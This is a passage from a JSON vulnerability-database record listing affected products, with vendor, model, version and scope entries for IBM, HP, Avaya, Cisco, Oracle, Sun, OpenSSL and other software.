            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.16"
          },
          {
            "_id": null,
            "model": "rational insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.13"
          },
          {
            "_id": null,
            "model": "sterling connect:direct browser",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.5.2"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v37007.5.0.2"
          },
          {
            "_id": null,
            "model": "smartcloud entry fp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.19"
          },
          {
            "_id": null,
            "model": "websphere service registry and repository",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "security appscan standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.8"
          },
          {
            "_id": null,
            "model": "domino fix pack interim f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.36"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.4"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.2"
          },
          {
            "_id": null,
            "model": "virtual connect enterprise manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "business server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "1x8664"
          },
          {
            "_id": null,
            "model": "rational doors web access",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.6.1.3"
          },
          {
            "_id": null,
            "model": "jdk update16",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "project openssl c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "vios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2.0.10"
          },
          {
            "_id": null,
            "model": "aura collaboration environment",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.3.2"
          },
          {
            "_id": null,
            "model": "domino fp if",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.123"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.3.0.1"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0"
          },
          {
            "_id": null,
            "model": "jdk update26",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "websphere process server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "system m2 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x355079460"
          },
          {
            "_id": null,
            "model": "idataplex dx360 m4 water cooled type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "79180"
          },
          {
            "_id": null,
            "model": "chassis management module 2pet12e",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "rational insight",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.12"
          },
          {
            "_id": null,
            "model": "domino fp if",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.153"
          },
          {
            "_id": null,
            "model": "vios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2.3.3"
          },
          {
            "_id": null,
            "model": "netezza platform software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.213"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0.2.106"
          },
          {
            "_id": null,
            "model": "aura conferencing",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.2"
          },
          {
            "_id": null,
            "model": "smartcloud entry fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.110"
          },
          {
            "_id": null,
            "model": "socialminer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.020"
          },
          {
            "_id": null,
            "model": "system type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x3690x571920"
          },
          {
            "_id": null,
            "model": "java sdk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "tivoli netcool configuration manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.3.0.6"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.4"
          },
          {
            "_id": null,
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.1"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.023"
          },
          {
            "_id": null,
            "model": "smart analytics system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "20500"
          },
          {
            "_id": null,
            "model": "san volume controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "0"
          },
          {
            "_id": null,
            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.15"
          },
          {
            "_id": null,
            "model": "flex system fc3171 8gb san switch and san pass-thru",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1.3.0"
          },
          {
            "_id": null,
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "12"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v50007.3"
          },
          {
            "_id": null,
            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.1"
          },
          {
            "_id": null,
            "model": "linux enterprise software development kit",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "12"
          },
          {
            "_id": null,
            "model": "java sdk sr16-fp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6"
          },
          {
            "_id": null,
            "model": "prime network registrar",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.3"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.33"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.1"
          },
          {
            "_id": null,
            "model": "db2 connect unlimited edition for system i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "netezza platform software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.0.1"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.1.2"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0"
          },
          {
            "_id": null,
            "model": "pureapplication system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.14"
          },
          {
            "_id": null,
            "model": "db2 connect unlimited edition for system z",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.05"
          },
          {
            "_id": null,
            "model": "rational reporting for development intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "domino fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.35"
          },
          {
            "_id": null,
            "model": "telepresence sx series",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "bbm on ios",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "2.7.0.32"
          },
          {
            "_id": null,
            "model": "tivoli storage flashcopy manager for vmware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.0.0"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.1.12"
          },
          {
            "_id": null,
            "model": "websphere message broker",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.13"
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.1.730"
          },
          {
            "_id": null,
            "model": "os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "1010.3.0.1052"
          },
          {
            "_id": null,
            "model": "enterprise manager ops center",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.2.1"
          },
          {
            "_id": null,
            "model": "messaging application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.0"
          },
          {
            "_id": null,
            "model": "cloud manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.0.2"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.0j",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "jdk update29",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "jdk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.0.180"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.4"
          },
          {
            "_id": null,
            "model": "jre update9",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "datapower gateway",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.0.13"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "3.0.2"
          },
          {
            "_id": null,
            "model": "systems insight manager sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "bbm protected on blackberry",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "100"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v50007.4.0.5"
          },
          {
            "_id": null,
            "model": "chassis management module 2pet10q",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "websphere real time sr",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "39"
          },
          {
            "_id": null,
            "model": "aura presence services sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "datapower gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.0.3"
          },
          {
            "_id": null,
            "model": "web experience factory",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.5"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70007.2.0.3"
          },
          {
            "_id": null,
            "model": "websphere service registry and repository studio",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "1.0.1"
          },
          {
            "_id": null,
            "model": "db2 connect application server edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.5"
          },
          {
            "_id": null,
            "model": "network node manager ispi performance for traffic",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "smartcloud entry fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.09"
          },
          {
            "_id": null,
            "model": "network node manager ispi for mpls vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "communication server 1000m signaling server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "flex system compute node type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x24089560"
          },
          {
            "_id": null,
            "model": "java sdk sr8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7"
          },
          {
            "_id": null,
            "model": "java",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.0.75"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.1j",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.5.2"
          },
          {
            "_id": null,
            "model": "tivoli asset management for it",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.0.1"
          },
          {
            "_id": null,
            "model": "cloudbridge",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "0"
          },
          {
            "_id": null,
            "model": "communication server 1000e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.2"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v37006.4.1.8"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.5"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "tivoli storage flashcopy manager for vmware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.2.0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "data ontap operating in 7-mode",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2.1"
          },
          {
            "_id": null,
            "model": "java sdk sr10",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler for applications fp01",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0"
          },
          {
            "_id": null,
            "model": "adaptive security appliance software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "9.0(4.29)"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70007.3.0.5"
          },
          {
            "_id": null,
            "model": "vios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2.1.9"
          },
          {
            "_id": null,
            "model": "rational software architect",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler distributed fp05",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "java sdk sr4-fp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v35007.1.0.6"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.0.6"
          },
          {
            "_id": null,
            "model": "flex system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.2.1.0"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.2.0.860"
          },
          {
            "_id": null,
            "model": "rational developer for power systems software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.01"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.0.34"
          },
          {
            "_id": null,
            "model": "chassis management module 2peo12e",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.12"
          },
          {
            "_id": null,
            "model": "cognos controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "jre update9",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0.90"
          },
          {
            "_id": null,
            "model": "websphere service registry and repository studio",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.4"
          },
          {
            "_id": null,
            "model": "linux arm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "java sdk 7r1 sr2-fp10",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v50006.1"
          },
          {
            "_id": null,
            "model": "aura presence services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.1"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.0.4"
          },
          {
            "_id": null,
            "model": "centos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "centos",
            "version": "5"
          },
          {
            "_id": null,
            "model": "flex system fc3171 8gb san switch and san pass-thru",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.1.1.00"
          },
          {
            "_id": null,
            "model": "web experience factory",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.1"
          },
          {
            "_id": null,
            "model": "domino fp if",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.152"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.10"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.0"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.4.2.1"
          },
          {
            "_id": null,
            "model": "rational developer for power systems software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.3"
          },
          {
            "_id": null,
            "model": "vios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2.1.8"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.10"
          },
          {
            "_id": null,
            "model": "systems insight manager sp6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "systems insight manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.3.2"
          },
          {
            "_id": null,
            "model": "cognos insight standard edition fp",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.2.24"
          },
          {
            "_id": null,
            "model": "java sdk sr13-fp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.14"
          },
          {
            "_id": null,
            "model": "telepresence server on multiparty media",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3104.1"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.016"
          },
          {
            "_id": null,
            "model": "norman shark scada protection",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "aura application server sip core sp10",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "53003.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.1"
          },
          {
            "_id": null,
            "model": "sterling connect:express for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.4"
          },
          {
            "_id": null,
            "model": "jdk 1.5.0 07-b03",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.2"
          },
          {
            "_id": null,
            "model": "flashcopy manager for unix and linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.0.0"
          },
          {
            "_id": null,
            "model": "buildforge",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.2"
          },
          {
            "_id": null,
            "model": "flashcopy manager for unix and linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.1.2"
          },
          {
            "_id": null,
            "model": "os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "security identity manager virtual appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.1"
          },
          {
            "_id": null,
            "model": "java sdk 6r1 sr8",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "mq light",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.2"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.3.2"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.1"
          },
          {
            "_id": null,
            "model": "cms r16",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "project openssl 0.9.8o",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "netezza platform software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "mysql server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "5.6.16"
          },
          {
            "_id": null,
            "model": "x-series xos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "9.6"
          },
          {
            "_id": null,
            "model": "project openssl e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.1.12"
          },
          {
            "_id": null,
            "model": "system m4 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x375087520"
          },
          {
            "_id": null,
            "model": "universal device service",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "0"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.2"
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.2.1"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.031"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.18"
          },
          {
            "_id": null,
            "model": "xiv storage system gen2 10.2.4.e-6",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "ip office server edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "sterling connect:express for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.35"
          },
          {
            "_id": null,
            "model": "db2 connect unlimited edition for system z",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.5"
          },
          {
            "_id": null,
            "model": "domino fp if",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.242"
          },
          {
            "_id": null,
            "model": "upward integration modules for vmware vsphere",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.5.2"
          },
          {
            "_id": null,
            "model": "network node manager ispi for ip multicast qa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "proactive contact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.5.5"
          },
          {
            "_id": null,
            "model": "chassis management module 2pet10a",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "malware analyzer g2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "video surveillance ptz ip cameras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "tivoli common reporting",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.1.0.841"
          },
          {
            "_id": null,
            "model": "systems insight manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler distributed",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "cloud",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "0"
          },
          {
            "_id": null,
            "model": "domino fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
